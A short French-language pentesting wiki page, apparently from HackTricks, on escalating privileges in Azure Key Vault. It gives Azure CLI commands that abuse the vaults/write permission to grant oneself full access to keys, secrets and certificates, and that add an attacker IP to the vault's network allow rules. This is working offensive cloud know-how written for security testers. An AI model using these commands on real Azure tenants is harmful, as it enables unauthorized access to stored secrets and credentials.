# Az - Key Vault Privesc

{{#include ../../../banners/hacktricks-training.md}}

## Azure Key Vault

Pour plus d'informations sur ce service, consultez :

{{#ref}}
../az-services/az-keyvault.md
{{#endref}}

### `Microsoft.KeyVault/vaults/write`

Un attaquant disposant de cette autorisation pourra modifier la politique d'un coffre-fort de clés (le coffre-fort de clés doit utiliser des politiques d'accès au lieu de RBAC).
```bash
# If access policies in the output, then you can abuse it
az keyvault show --name <vault-name>

# Get current principal ID
az ad signed-in-user show --query id --output tsv

# Assign all permissions
az keyvault set-policy \
--name <vault-name> \
--object-id <your-object-id> \
--key-permissions all \
--secret-permissions all \
--certificate-permissions all \
--storage-permissions all
```
### Modifier les restrictions réseau

Il se peut que vous ayez suffisamment de permissions pour accéder à des données sensibles (comme la valeur d'un secret) mais que vous ne puissiez pas y accéder car le key vault est restreint à un réseau spécifique. Si vous avez la permission de modifier les restrictions réseau, vous pouvez ajouter votre IP à la liste des IP autorisées.
```bash
# Get the current network restrictions
az keyvault network-rule list --name <vault-name>

# Add your IP to the list
az keyvault network-rule add --name <vault-name> --ip-address <your-ip>
```
{{#include ../../../banners/hacktricks-training.md}}
